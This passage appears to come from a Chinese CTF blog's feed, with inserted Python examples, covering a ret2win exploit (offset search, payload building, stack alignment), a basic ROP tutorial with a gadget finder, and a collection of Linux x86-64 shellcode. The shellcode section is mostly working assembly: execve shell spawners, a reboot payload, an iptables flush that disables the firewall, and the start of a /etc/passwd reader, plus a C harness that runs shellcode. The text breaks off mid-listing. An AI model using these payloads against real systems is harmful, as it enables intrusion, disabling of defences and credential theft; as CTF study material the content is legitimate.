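The offset search and the alignment fix above, as an added example in Python that is not part of the original post and uses neither pwntools nor peda: a De Bruijn cyclic pattern is generated (the same idea as pattern create), the 8 bytes that land in the return-address slot of a simulated pwnme() frame are looked up to recover the offset, the payload is built both ways (prologue skipped, or an extra ret gadget in front of the original address), and rsp is tracked modulo 16 from pwnme()'s ret to the entry of system() to show why only those two variants work. The frame layout (32-byte buffer, then the saved rbp, then the return address, 56-byte read) is taken from the decompilation; the ret gadget address 0x40053e and the original return address used in the simulation are assumptions, not values from the binary.

```python
def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4, length=200):
    """First `length` bytes of the De Bruijn sequence B(k, n): every n-byte window is
    unique, so any n (or more) bytes found in a register or the return slot identify
    their offset in the pattern. Standard recursive construction, cut off at `length`."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    out.append(alphabet[a[j]])
                    if len(out) >= length:
                        return
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def cyclic_find(chunk, pattern):
    """Offset of `chunk` (the bytes read out of the overwritten return slot) in the pattern."""
    return pattern.find(chunk)


def simulate_pwnme(data, bufsize=32):
    """Model of pwnme()'s frame: s[32], then the 8-byte saved rbp, then the return address.
    read(0, s, 0x38) copies at most 56 bytes, exactly enough to reach the return slot.
    Returns the 8 bytes that end up in the return address slot."""
    frame = bytearray(bufsize + 8 + 8)
    frame[bufsize + 8:] = (0x400700).to_bytes(8, "little")  # hypothetical original return address
    data = data[:0x38]                                       # read() length limit
    frame[:len(data)] = data
    return bytes(frame[bufsize + 8:bufsize + 16])


def find_offset(pattern_len=200):
    """Send a cyclic pattern through the simulated overflow and look up the returned chunk."""
    pattern = de_bruijn(length=pattern_len)
    return cyclic_find(simulate_pwnme(pattern), pattern)


RET2WIN = 0x400756              # address of ret2win() from the binary
RET2WIN_NO_PROLOGUE = 0x40075a  # ret2win() + 4: skips push rbp; mov rbp, rsp
RET_GADGET = 0x40053e           # hypothetical address of a lone "ret" gadget, not from the binary


def p64(value):
    return value.to_bytes(8, "little")


def build_payload(offset, skip_prologue=True):
    """Two equivalent ways of keeping rsp 16-byte aligned when ret2win() calls system()."""
    if skip_prologue:
        return b"a" * offset + p64(RET2WIN_NO_PROLOGUE)
    return b"a" * offset + p64(RET_GADGET) + p64(RET2WIN)


def rsp_mod16_at_system(use_ret_gadget, skip_prologue):
    """Track rsp modulo 16 from pwnme()'s ret to the entry of system(). The ABI wants
    rsp % 16 == 8 at every function entry (rsp + 8 aligned to 16); glibc's system()
    uses movaps on that assumption and faults otherwise."""
    rsp = 0            # after pwnme's ret pops the return address, rsp is 16-byte aligned
    if use_ret_gadget:
        rsp += 8       # the extra ret pops one more qword
    if not skip_prologue:
        rsp -= 8       # push rbp in ret2win's prologue
    rsp -= 8           # call system pushes the return address
    return rsp % 16


if __name__ == "__main__":
    off = find_offset()
    print("offset:", off)
    print("payload (skip prologue):", build_payload(off).hex())
    print("payload (ret gadget):   ", build_payload(off, skip_prologue=False).hex())
    for gadget in (False, True):
        for skip in (False, True):
            print("ret gadget=%s skip prologue=%s -> rsp %% 16 = %d at system()"
                  % (gadget, skip, rsp_mod16_at_system(gadget, skip)))
```

Using both fixes at once misaligns the stack again, which the last function makes visible: each of them shifts rsp by 8, and the goal is an odd number of 8-byte shifts between pwnme()'s ret and the call.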
<summary type="html"><blockquote>
<p>题目地址:<a href="https://ropemporium.com/challenge/ret2win.html">ret2win</a></p>
</blockquote>
<h2 id="0x1"><a class="markdownI</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2win" scheme="https://www.rgzzplus.com/tags/ret2win/"/>
</entry>
<entry>
<title>基本ROP</title>
<link href="https://www.rgzzplus.com/2022/09/18/%E5%9F%BA%E6%9C%ACROP/"/>
<id>https://www.rgzzplus.com/2022/09/18/%E5%9F%BA%E6%9C%ACROP/</id>
<published>2022-09-18T02:24:07.000Z</published>
<updated>2022-09-19T07:53:55.820Z</updated>
<content type="html"><![CDATA[<h1 id="基本-rop"><a class="markdownIt-Anchor" href="#基本-rop"></a> Basic ROP</h1><h2 id="rop-简介"><a class="markdownIt-Anchor" href="#rop-简介"></a> Introduction to ROP</h2><p>In the beginning it was enough to overwrite the function's return address with the address of a <code>jmp esp</code> instruction and append shellcode after it. Then NX was introduced: the memory pages holding data are marked non-executable, and trying to execute shellcode there raises an exception. If injected code cannot run, the remaining option is to reuse code the program already contains.</p><p>A few concepts:</p><ol><li>ROP: <strong>Return Oriented Programming. Building on a stack buffer overflow, it uses small instruction fragments (gadgets) that already exist in the program to change the values of registers or variables and thereby control the program's execution flow.</strong></li><li>gadgets: short instruction sequences inside the program. Often several gadgets have to be chained to run the command we want. A gadget normally ends in <code>ret</code>, because that is what hands control (EIP) to the next gadget: the program keeps taking the next address from the stack and executing it.</li><li>ROPgadget: a command-line tool for finding gadgets. It is a separate project rather than a part of pwntools (pwntools has its own ROP class), although the two are usually installed together. For example, to look for the pop/ret sequences that involve eax:<br><code>ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax"</code></li><li>On Linux every system call has a number. For example, <code>execve("/bin/sh", NULL, NULL)</code> is system call 59 (0x3b) on x86-64; on 32-bit x86, where the call is made through <code>int 0x80</code>, execve is number 11 (0xb).</li></ol><p>It is called ROP because the core trick is the instruction set's <code>ret</code> instruction, used to redirect the flow of execution. A ROP attack generally requires:</p><ul><li>The program has an overflow and the return address can be controlled.</li><li>Gadgets that do what we need exist and their addresses can be found.</li></ul><p>If the gadgets' addresses change from run to run (PIE or ASLR), we need a way to obtain the current addresses dynamically, typically through an information leak.</p><h2 id="寻找-gadgets"><a class="markdownIt-Anchor" href="#寻找-gadgets"></a> Finding gadgets</h2><ol><li>Search the program for every <code>c3</code> (<code>ret</code>) byte.</li><li>Walk backwards from each one and check whether the preceding bytes form valid instructions; the maximum number of bytes to walk back can be limited, which yields gadgets of different lengths. Because x86 instructions have variable length, starting the decode at a different byte can give a different, equally valid instruction sequence, so one <code>ret</code> often yields several gadgets.</li><li>Record every valid instruction sequence found.</li></ol><p>In theory gadgets can be found by hand this way, but in practice many tools do the work, such as ROPgadget and Ropper. A more complete search is offered by <a href="http://ropshell.com/">http://ropshell.com/</a>.</p><h3 id="常用的-gadgets"><a class="markdownIt-Anchor" href="#常用的-gadgets"></a> Commonly used gadgets</h3><p>Almost anything you can think of can be done with gadgets. A few common kinds:</p><ul><li>Save stack data to a register<ul><li>Pops the value on top of the stack into a register and continues at the new top of the stack. When the return address is overwritten with the gadget's address, the program executes that instruction sequence after returning.</li><li>e.g. <code>pop eax; ret</code></li></ul></li><li>Load memory into a register<ul><li>Loads the data at a memory address into a register.</li><li>e.g. <code>mov ecx,[eax]; ret</code></li></ul></li><li>Store a register to memory<ul><li>Writes the value of a register to a memory address.</li><li>e.g. <code>mov [eax],ecx; ret</code></li></ul></li><li>Arithmetic and logic<ul><li>add, sub, mul, xor and so on.</li><li>e.g. <code>add eax,ebx; ret</code>, <code>xor edx,edx; ret</code></li></ul></li><li>System calls<ul><li>Enter the kernel.</li><li>e.g. <code>int 0x80; ret</code>, <code>call gs:[0x10]; ret</code></li></ul></li><li>Gadgets that change the stack frame<ul><li>These change ebp and therefore the stack frame; they are needed for operations such as stack pivoting, which moves the frame somewhere we control.</li><li>e.g. <code>leave; ret</code>, <code>pop ebp; ret</code></li></ul></li></ul><h2 id="ret2text"><a class="markdownIt-Anchor" href="#ret2text"></a> ret2text</h2><h3 id="原理"><a class="markdownIt-Anchor" href="#原理"></a> Principle</h3><p>ret2text means making the program execute code that already exists in its own .text section. This is really a generic description: when redirecting execution into existing code we can also chain several non-adjacent pieces of it (gadgets), which is the ROP described above.</p><p>We need to know the location of the code to return to. The program may also have protections enabled, in which case we have to find a way around them.</p><h3 id="例子"><a class="markdownIt-Anchor" href="#例子"></a> Example</h3><p><a href="https://www.rgzzplus.com/2022/09/05/ret2text/">ret2text@rgzzplus</a></p><h2 id="ret2shellcode"><a class="markdownIt-Anchor" href="#ret2shellcode"></a> ret2shellcode</h2><h3 id="原理-2"><a class="markdownIt-Anchor" href="#原理-2"></a> Principle</h3><p>ret2shellcode means making the program execute shellcode: assembly code written to perform some function, most commonly to obtain a shell on the target. <strong>Generally we have to supply the shellcode ourselves; this is the other typical technique, in which we fill in executable code of our own.</strong></p><p>On top of the stack overflow, executing shellcode requires that the region where the shellcode is placed is executable while the binary runs.</p><h3 id="例子-2"><a class="markdownIt-Anchor" href="#例子-2"></a> Example</h3><p><a href="https://www.rgzzplus.com/2022/09/05/ret2shellcode/">ret2shellcode@rgzzplus</a></p><h2 id="ret2syscall"><a class="markdownIt-Anchor" href="#ret2syscall"></a> ret2sy

scall</h2><h3 id="原理-3"><a class="markdownIt-Anchor" href="#原理-3"></a> Principle</h3><p>ret2syscall means making the program perform a system call, such as <code>execve("/bin/sh", NULL, NULL)</code>, to obtain a shell: gadgets set up the registers that hold the system call number and its arguments, and the chain then returns to an <code>int 0x80</code> (x86) or <code>syscall</code> (x86-64) instruction.</p><h3 id="例子-3"><a class="markdownIt-Anchor" href="#例子-3"></a> Example</h3><p><a href="https://www.rgzzplus.com/2022/09/18/ret2syscall/">ret2syscall@rgzzplus</a></p><h2 id="ret2libc"><a class="markdownIt-Anchor" href="#ret2libc"></a> ret2libc</h2><h3 id="原理-4"><a class="markdownIt-Anchor" href="#原理-4"></a> Principle</h3><p>ret2libc means making the program execute a function from libc, usually by returning to the function's PLT entry or to its actual address (the content of its GOT entry). Most of the time we want to run <code>system("/bin/sh")</code>, so we need the address of system, and the address of a "/bin/sh" string to pass to it.</p><h3 id="例子-4"><a class="markdownIt-Anchor" href="#例子-4"></a> Example</h3><p><a href="https://www.rgzzplus.com/2022/09/18/ret2libc/">ret2libc@rgzzplus</a></p><h2 id="其它例子"><a class="markdownIt-Anchor" href="#其它例子"></a> Other examples</h2><p><a href="https://www.rgzzplus.com/2022/09/18/ret2win/">ret2win@rgzzplus</a></p>]]></content>
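The three-step search described under "Finding gadgets" above, as an added example that is not part of the original post and not ROPgadget's code: every c3 byte is located, the bytes before it are walked back through a deliberately small hand-written decoder for the x86 / x86-64 encodings that matter most for gadgets (push/pop, the register forms of mov/xor/add, leave, nop, syscall, int 0x80, and the REX prefixes for r8-r15 and 64-bit operands), and each start position from which decoding lands exactly on that ret is recorded. A filter mimicking the page's ROPgadget --only "pop|ret" | grep usage is included. The input is a constructed byte string, not a real binary; a real run would feed it the .text section of an ELF. Any opcode the decoder does not know simply ends the walk back, so this finds a subset of what ROPgadget finds.

```python
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REGS64_EXT = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
# opcode -> mnemonic for the "op r/m, r" register-to-register forms (ModRM mod == 11)
RM_OPS = {0x31: "xor", 0x89: "mov", 0x01: "add"}


def _rm_form(mnem, modrm, regs):
    # Intel syntax: destination is the r/m field (low 3 bits), source is the reg field
    return "%s %s, %s" % (mnem, regs[modrm % 8], regs[(modrm >> 3) % 8])


def decode_one(code, i, bits):
    """Decode one instruction at code[i] (bits = 32 or 64). Returns (text, length) or None
    for anything outside the small subset this example understands."""
    op = code[i]
    regs = REGS64 if bits == 64 else REGS32
    if op == 0xc3:
        return ("ret", 1)
    if op == 0x90:
        return ("nop", 1)
    if op == 0xc9:
        return ("leave", 1)
    if op in range(0x58, 0x60):
        return ("pop " + regs[op - 0x58], 1)
    if op in range(0x50, 0x58):
        return ("push " + regs[op - 0x50], 1)
    if bits == 32 and op in range(0x40, 0x48):   # 0x40-0x4f are inc/dec on x86 ...
        return ("inc " + REGS32[op - 0x40], 1)
    if bits == 32 and op in range(0x48, 0x50):
        return ("dec " + REGS32[op - 0x48], 1)
    if bits == 64 and op == 0x48 and len(code) > i + 2:   # ... and REX prefixes on x86-64
        op2, modrm = code[i + 1], code[i + 2]
        if op2 in RM_OPS and modrm >> 6 == 3:
            return (_rm_form(RM_OPS[op2], modrm, REGS64), 3)   # REX.W: 64-bit operands
        return None
    if i + 1 >= len(code):
        return None
    nxt = code[i + 1]
    if op == 0xcd and nxt == 0x80:
        return ("int 0x80", 2)
    if op == 0x0f and nxt == 0x05:
        return ("syscall", 2)
    if bits == 64 and op == 0x41 and nxt in range(0x58, 0x60):   # REX.B: pop r8..r15
        return ("pop " + REGS64_EXT[nxt - 0x58], 2)
    if bits == 64 and op == 0x41 and nxt in range(0x50, 0x58):   # REX.B: push r8..r15
        return ("push " + REGS64_EXT[nxt - 0x50], 2)
    if op in RM_OPS and nxt >> 6 == 3:
        return (_rm_form(RM_OPS[op], nxt, REGS32), 2)
    return None


def _decode_run(code, start, ret_pos, bits):
    """Decode linearly from `start`; return the instruction texts if decoding lands exactly on
    ret_pos without overshooting it or passing an earlier ret, else None."""
    insns, pos = [], start
    while pos != ret_pos:
        if pos > ret_pos:
            return None
        d = decode_one(code, pos, bits)
        if d is None or d[0] == "ret":
            return None
        insns.append(d[0])
        pos += d[1]
    return insns


def find_gadgets(code, bits=64, max_bytes=8, base=0):
    """Step 1: locate every 0xc3. Step 2: walk back up to max_bytes and keep every start from
    which decoding reaches that ret. Step 3: record them. Returns sorted (address, text) pairs,
    one per distinct text (lowest address wins), including the bare "ret" gadget."""
    found = {}
    for ret_pos in range(len(code)):
        if code[ret_pos] != 0xc3:
            continue
        found.setdefault("ret", base + ret_pos)
        for start in range(max(ret_pos - max_bytes, 0), ret_pos):
            insns = _decode_run(code, start, ret_pos, bits)
            if insns is not None:
                found.setdefault("; ".join(insns + ["ret"]), base + start)
    return sorted((addr, text) for text, addr in found.items())


def filter_gadgets(gadgets, only=None, contains=None):
    """Mimic `ROPgadget --only "pop|ret" | grep rdi`: keep gadgets whose every mnemonic is in
    `only` (a '|'-separated list) and whose text contains the `contains` substring."""
    allowed = set(only.split("|")) if only else None
    kept = []
    for addr, text in gadgets:
        mnems = [insn.split()[0] for insn in text.split("; ")]
        if allowed is not None and not all(m in allowed for m in mnems):
            continue
        if contains and contains not in text:
            continue
        kept.append((addr, text))
    return kept


# Constructed sample .text bytes (not from a real binary), x86-64 encodings.
SAMPLE_TEXT = bytes([
    0x55,                           # push rbp
    0x48, 0x89, 0xe5,               # mov rbp, rsp
    0x5f, 0xc3,                     # pop rdi; ret
    0x41, 0x5c, 0x5d, 0xc3,         # pop r12; pop rbp; ret
    0x31, 0xc0, 0x0f, 0x05, 0xc3,   # xor eax, eax; syscall; ret
    0x48, 0x89, 0xe7, 0xc9, 0xc3,   # mov rdi, rsp; leave; ret
    0x89, 0xc3,                     # mov ebx, eax: its ModRM byte is c3, a misaligned "ret"
    0xc3,                           # ret
])

if __name__ == "__main__":
    for addr, text in find_gadgets(SAMPLE_TEXT, bits=64, base=0x400000):
        print("0x%06x : %s" % (addr, text))
```

Note the results the walk back produces that a disassembler never would: the c3 hidden inside mov ebx, eax is examined like any other and correctly yields nothing, while the 48 89 e5 of mov rbp, rsp also yields mov ebp, esp; pop rdi; ret when decoding starts one byte late. Gadgets that contain an inner ret are discarded, since control would never reach the instructions after it.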
<summary type="html"><h1 id="基本-rop"><a class="markdownIt-Anchor" href="#基本-rop"></a> 基本 ROP</h1>
<h2 id="rop-简介"><a class="markdownIt-Anchor" href="#rop-简介"></a</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ROP" scheme="https://www.rgzzplus.com/tags/ROP/"/>
</entry>
<entry>
<title>shellcode_linux_x86_64</title>
<link href="https://www.rgzzplus.com/2022/09/06/shellcode-linux-x86-64/"/>
<id>https://www.rgzzplus.com/2022/09/06/shellcode-linux-x86-64/</id>
<published>2022-09-06T08:21:17.000Z</published>
<updated>2022-09-06T08:21:38.822Z</updated>
<content type="html"><![CDATA[<p>[TOC]</p><blockquote><p>本文是我的另一篇文章的精简版,删除了参考文章,以及一些额外的解释,只保留了最关键的部分。如想学习写shellcode,可以去阅读 <a href="https://www.rgzzplus.com/2022/08/08/Linux-shellcode%E5%BC%80%E5%8F%91%E4%B9%8B%E5%AE%9E%E6%88%98/">Linux_shellcode开发之实战</a></p></blockquote><h1 id="0-readme"><a class="markdownIt-Anchor" href="#0-readme"></a> 0. README</h1><p>下列文章中的汇编代码,用下面的命令编译运行:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$ </span><span class="language-bash">nasm -f elf64 fileName.asm</span> </span><br><span class="line"><span class="meta">$ </span><span class="language-bash">ld -m elf_x86_64 fileName.o -o fileName</span> </span><br><span class="line"><span class="meta">$ </span><span class="language-bash">./fileName</span> </span><br></pre></td></tr></table></figure><blockquote><p>注意:这里和下面的 fileName,都要用实际相应的文件名替换。</p></blockquote><p>用下面这串命令,来自动提取机器码:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in $(objdump -d fileName.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo </span><br></pre></td></tr></table></figure><blockquote><p>注意:提取出的机器码放在 c语言代码的 shellcode[] 这个常量数组中。</p></blockquote><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//fileName.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span 
class="string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><string.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">const</span> <span class="type">char</span> shellcode[] = <span class="string">"/*将机器码放在这里*/"</span>;</span><br><span class="line"> <span class="comment">//当shellcode包含空字符时,printf 将会打印出错误的 shellcode 长度</span></span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Shellcode length: %d bytes\n"</span>,<span class="built_in">strlen</span>(shellcode));</span><br><span class="line"> (*(<span class="type">void</span>(*)())shellcode)();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>搭建好的 c语言代码,用下面的命令编译运行:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$ </span><span class="language-bash">gcc fileName.c -o fileName -z execstack -z norelro -no-pie -g</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash">./execve_sh64</span></span><br></pre></td></tr></table></figure><p>以下,只提供汇编代码,相应参数我会在代码头做相应注释。</p><h1 id="1-打开-terminal"><a class="markdownIt-Anchor" href="#1-打开-terminal"></a> 1. 
打开 terminal</h1><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">; execveSh64_30.asm</span><br><span class="line">; length = 30 bytes</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"> </span><br><span class="line">_start:</span><br><span class="line">; execve("/bin/sh", ["/bin/sh"], NULL)</span><br><span class="line">; rax = 0x3b, rdx= NULL, rdi = '//bin/sh', rsi = '//bin/sh'</span><br><span class="line">xorrdx, rdx</span><br><span class="line">movqword rbx, '//bin/sh'; 0x68732f6e69622f2f</span><br><span class="line">shrrbx, 0x8</span><br><span class="line">pushrbx</span><br><span class="line">movrdi, rsp</span><br><span class="line">pushrax</span><br><span class="line">pushrdi</span><br><span class="line">movrsi, rsp</span><br><span class="line">moval, 0x3b</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">; execveSh64_28.asm</span><br><span class="line">; length = 28 bytes</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">xor rcx, rcx</span><br><span class="line">mul rcx</span><br><span class="line"></span><br><span class="line">add al, 0x3b ; execve()</span><br><span class="line">mov rbx, 0x68732f2f6e69622f ; hs//nib/</span><br><span class="line"></span><br><span class="line">; Argument one shell[0] = "/bin//sh"</span><br><span class="line">push rdx ; null</span><br><span class="line">push rbx ; hs//nib/</span><br><span class="line"></span><br><span class="line">; We need pointers for execve()</span><br><span class="line">push rsp ; *pointer to shell[0]</span><br><span class="line">pop rdi ; Argument 1</span><br><span class="line"></span><br><span class="line">; Argument two shell (including address of each argument in array)</span><br><span class="line">push rdx ; null</span><br><span class="line">push rdi ; address of shell[0]</span><br><span class="line"></span><br><span class="line">; We need pointers for execve()</span><br><span class="line">push rsp ; address of char * shell</span><br><span 
class="line">pop rsi ; Argument 2</span><br><span class="line"></span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">;execveSh64_27.asm</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">xor eax, eax</span><br><span class="line">mov rbx, 0xFF978CD091969DD1</span><br><span class="line">neg rbx</span><br><span class="line">push rbx</span><br><span class="line">;mov rdi, rsp</span><br><span class="line">push rsp</span><br><span class="line">pop rdi</span><br><span class="line">cdq</span><br><span class="line">push rdx</span><br><span class="line">push rdi</span><br><span class="line">;mov rsi, rsp</span><br><span class="line">push rsp</span><br><span class="line">pop rsi</span><br><span class="line">mov al, 0x3b</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><blockquote><p><a href="https://blog.csdn.net/zmrz1/article/details/53349631">关于汇编语言中cdq指令作用解惑</a></p><p>cdq的作用无非就是将一个32位有符合数扩展为64位有符合数,数据能表示的数不变,具体是这样实现的,比如eax=fffffffb(值为-5),然后cdq把eax的最高位bit,也就是二进制1,全部复制到edx的每一个bit位,EDX 
变成 FFFFFFFF,这时eax与edx连起来就是一个64位数,FFFFFFFF FFFFFFFB ,它是一个 64 bit 的大型数字,数值依旧是 -5</p></blockquote><h1 id="2-重启-reboot"><a class="markdownIt-Anchor" href="#2-重启-reboot"></a> 2. 重启 reboot</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">; execveReboot.asm</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"> </span><br><span class="line">_start:</span><br><span class="line">; execve("/usr/sbin/reboot", ["/usr/sbin/reboot"], NULL)</span><br><span class="line">; rax = 0x3b, rdx= NULL, rdi = '/usr/sbin/reboot', rsi = '/usr/sbin/reboot'</span><br><span class="line">xorrdx, rdx</span><br><span class="line">push rdx</span><br><span class="line">movrbx, 'n/reboot'</span><br><span class="line">pushrbx</span><br><span class="line">mov rbx, '/usr/sbi'</span><br><span class="line">push rbx</span><br><span class="line">movrdi, rsp</span><br><span class="line">pushrax</span><br><span class="line">pushrdi</span><br><span class="line">movrsi, rsp</span><br><span class="line">moval, 0x3b</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure><h1 id="3-关闭防火墙清空-iptable"><a class="markdownIt-Anchor" href="#3-关闭防火墙清空-iptable"></a> 3. 
关闭防火墙(清空 iptable)</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">; clearIptable.asm</span><br><span class="line">; 注:需要root权限</span><br><span class="line">section .text</span><br><span class="line">global _start</span><br><span class="line"> </span><br><span class="line">_start:</span><br><span class="line"> xor rax, rax</span><br><span class="line"> push rax</span><br><span class="line"> push word 0x462d</span><br><span class="line"> mov rcx, rsp</span><br><span class="line"> </span><br><span class="line"> mov rbx, 0x73656c626174ffff</span><br><span class="line"> shr rbx, 0x10</span><br><span class="line"> push rbx</span><br><span class="line"> mov rbx, 0x70692f6e6962732f</span><br><span class="line"> push rbx</span><br><span class="line"> mov rdi, rsp</span><br><span class="line"> </span><br><span class="line"> push rax</span><br><span class="line"> push rcx</span><br><span class="line"> push rdi</span><br><span class="line"> mov rsi, rsp</span><br><span class="line"> </span><br><span class="line"> ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL);</span><br><span 
class="line"> mov al, 0x3b</span><br><span class="line"> syscall</span><br></pre></td></tr></table></figure><h1 id="4-passwd"><a class="markdownIt-Anchor" href="#4-passwd"></a> 4. passwd</h1><h2 id="41-读取-passwd"><a class="markdownIt-Anchor" href="#41-读取-passwd"></a> 4.1 读取 passwd</h2><h3 id="cat-读取"><a class="markdownIt-Anchor" href="#cat-读取"></a> cat 读取</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">; catPasswd.asm</span><br><span class="line">; execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)</span><br><span class="line"></span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span 
